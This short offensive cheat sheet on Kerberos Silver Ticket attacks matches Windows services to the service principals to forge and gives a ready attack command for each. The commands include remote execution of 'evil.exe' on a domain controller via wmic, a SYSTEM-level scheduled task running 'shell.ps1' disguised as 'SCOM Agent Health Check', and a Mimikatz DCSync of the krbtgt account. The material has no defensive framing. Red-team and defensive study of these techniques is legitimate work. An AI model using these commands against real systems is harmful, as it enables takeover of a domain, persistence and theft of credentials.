Silver Ticket

Service to target when requesting a TGS:

| Service type | Silver Ticket service | Attacks |
| --- | --- | --- |
| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` |
| PowerShell Remoting | HTTP + WSMAN | `New-PSSession -Name PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
| WinRM | HTTP + WSMAN | `New-PSSession -Name PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /TN "SCOM Agent Health Check" /TR "C:/shell.ps1"` |
| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` |
| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` |
| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | |
